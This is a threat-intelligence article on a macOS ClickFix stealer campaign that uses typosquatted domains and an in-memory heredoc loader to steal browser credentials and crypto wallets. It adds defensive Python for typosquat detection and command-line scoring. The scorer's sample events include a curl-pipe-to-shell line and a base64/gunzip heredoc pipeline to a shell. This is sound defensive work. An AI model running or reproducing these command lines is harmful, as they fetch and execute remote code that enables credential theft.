A new and sophisticated social engineering campaign, dubbed “Matryoshka,” is targeting macOS users with stealer malware. This evolved variant of the ClickFix technique wraps its payload in nested obfuscation layers to evade security scanners and automated analysis systems. The campaign’s goal is to trick users into executing malicious Terminal commands disguised as legitimate software fixes, sidestepping the protections that normally apply to downloaded and launched applications.
The attackers rely on typosquatting domains: websites whose slightly misspelled names mimic legitimate ones, catching users who mistype the address of a popular software review site. Victims who land on one of these domains are shown a convincing fake installation prompt instructing them to copy a supposed “fix” command and paste it directly into the macOS Terminal. Intego analysts identified this emerging attack chain after observing typosquatted domains such as comparisions[.]org, which closely resembles the legitimate comparisons.org.
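One defensive check the typosquatting lure invites is comparing observed domains against a watch-list of brand domains by edit distance, so that near-misses like comparisions[.]org can be blocked before a user ever sees the fake prompt. The code below is an added example, not Intego’s tooling; the watch-list and the observed domains are constructed, and the registrable-domain extraction is a naive two-label split rather than a public-suffix lookup.

```python
# Added example: flag candidate typosquats of known-good domains by
# optimal-string-alignment (Damerau-Levenshtein) distance. Suitable as a
# pre-filter for a DNS/proxy block-list; constructed inputs only.
KNOWN_GOOD = ["comparisons.org"]  # constructed watch-list of brand domains

# Constructed sample of domains seen in DNS/proxy logs (defanged as in reports).
OBSERVED = ["comparisions[.]org", "comparisons.org", "example.net", "compar1sons.org"]

def dl_distance(a: str, b: str) -> int:
    """Edit distance counting insert, delete, substitute and adjacent swap."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]

def defang(domain: str) -> str:
    """Undo the '[.]' defanging used in threat reports and normalise case."""
    return domain.replace("[.]", ".").lower().strip(".")

def registrable(domain: str) -> str:
    """Naive registrable domain: last two labels (no public-suffix list)."""
    return ".".join(domain.split(".")[-2:])

def typosquat_candidates(observed, known_good=KNOWN_GOOD, max_dist=2):
    """Return (raw_domain, impersonated_domain, distance) for near-misses.
    Exact matches (distance 0) are the legitimate site and are not flagged."""
    hits = []
    for raw in observed:
        dom = registrable(defang(raw))
        for good in known_good:
            dist = dl_distance(dom, good)
            if 0 < dist <= max_dist:
                hits.append((raw, good, dist))
    return hits
```

Tune max_dist per watch-list: short brand names need a tighter bound than long ones to keep false positives down.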
Infection Mechanism and Evasion Tactics of Matryoshka Malware
Unlike earlier ClickFix iterations, which used straightforward, readable scripts, the Matryoshka variant employs advanced evasion techniques designed to frustrate both security researchers and automated tools. The malicious payload is encoded and compressed, and stays hidden until the moment of execution. Crucially, it unpacks and runs entirely in memory, so no discernible script file is written to disk. This in-memory execution keeps the malware out of sight of file-based scanners and makes static analysis considerably harder.
The Matryoshka infection unfolds in multiple stages, each crafted to stay stealthy while keeping the chain operational. When a victim pastes the attacker-supplied Terminal command, it retrieves a shell script. That script carries a large encoded payload inside a heredoc, the shell construct for embedding a literal block of data within a script. The data is then fed through an in-memory pipeline that decodes and decompresses it without leaving easily detectable file artifacts on the system.
The loader component of the Matryoshka malware exhibits several evasion behaviors that let it operate unnoticed. It detaches its main routine to run in the background, so the Terminal prompt returns almost instantly; the victim assumes the process has finished when in fact the malware has only just started. To suppress any visible trace in the terminal session, the script redirects standard input, output, and error. The command-and-control (C2) infrastructure is further protected by requiring specific custom headers on every request: automated scanners that do not present the correct headers receive only generic error messages, which shields the C2 server from casual probing and analysis.
Once running, the Matryoshka stealer’s primary objective is to harvest sensitive user information. The loader retrieves an AppleScript payload built for this purpose. The payload targets browser credentials, aiming to steal login data stored by popular web browsers, and cryptocurrency wallet applications, including Trezor Suite and Ledger Live. It first attempts programmatic credential theft, extracting stored passwords and authentication tokens directly. If that fails, it falls back to displaying deceptive system dialog boxes that repeatedly ask the user for a password. The barrage of prompts is meant to wear down the victim’s resistance until they comply and hand over their credentials.
Security experts strongly advise macOS users never to paste commands sourced from websites directly into the Terminal. Legitimate software updates and system fixes do not require users to run arbitrary commands in this way. Organizations are further urged to block identified typosquatting domains, monitor for unusual Terminal-initiated execution patterns, and watch for suspicious staging archives or any sign of tampering with cryptocurrency wallet applications. The evolving nature of such threats underscores the need for continuous vigilance and up-to-date security practices.
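The “unusual Terminal-initiated execution patterns” worth monitoring are the traits the loader description above spells out: a heredoc feeding an in-memory decode-and-decompress pipeline, a pipe into a shell, a backgrounded routine, and muted standard streams. The following is an added detection example (not Intego’s code) that scores process-execution events for those traits; the event records are constructed, and a real deployment would consume an EDR or Endpoint Security process stream rather than an inline list.

```python
# Added example: heuristic scoring of shell command lines for ClickFix-style
# loader traits described in the Matryoshka analysis. Constructed events only.
import re

# Each trait is one observable the report attributes to the loader.
TRAITS = {
    "heredoc":      re.compile(r"<<-?\s*['\"]?\w+['\"]?"),
    "decode":       re.compile(r"base64\s+(-d|--decode|-D)\b|openssl\s+enc\b"),
    "decompress":   re.compile(r"\b(gunzip|gzip\s+-d|xz\s+-d|bunzip2|zcat)\b"),
    "pipe_to_sh":   re.compile(r"\|\s*(ba|z|k)?sh\b"),
    "background":   re.compile(r"(&\s*$|\bnohup\b|\bdisown\b)"),
    "mute_streams": re.compile(r">\s*/dev/null\s+2>&1|</dev/null"),
    "fetch":        re.compile(r"\b(curl|wget)\b"),
}
TERMINAL_PARENTS = {"Terminal", "iTerm2"}  # interactive, user-pasted context

# Constructed process-exec events; PLACEHOLDER.invalid stands in for a lure host.
EVENTS = [
    {"pid": 501, "parent": "Terminal",
     "cmdline": "curl -fsSL https://PLACEHOLDER.invalid/fix.sh | sh"},
    {"pid": 502, "parent": "sh",
     "cmdline": "cat <<'EOF' | base64 -d | gunzip | sh >/dev/null 2>&1 </dev/null &"},
    {"pid": 503, "parent": "Terminal", "cmdline": "git pull origin main"},
    {"pid": 504, "parent": "Terminal", "cmdline": "brew update 2>/dev/null"},
    {"pid": 505, "parent": "Terminal", "cmdline": "tar -xzf backup.tar.gz"},
]

def score_event(ev):
    """Return (score, matched_traits). One point per trait, plus one when the
    command was spawned from an interactive terminal and matched anything."""
    hits = [name for name, rx in TRAITS.items() if rx.search(ev["cmdline"])]
    score = len(hits)
    if hits and ev.get("parent") in TERMINAL_PARENTS:
        score += 1
    return score, hits

def flag_clickfix(events, threshold=3):
    """Events at or above the threshold, as (pid, score, traits)."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append((ev["pid"], score, hits))
    return flagged
```

The threshold trades recall for noise: a bare curl-pipe-to-shell from a terminal scores 3, while the fully muted, backgrounded heredoc pipeline scores 6, so alerting tiers can be keyed off the score rather than a single regex.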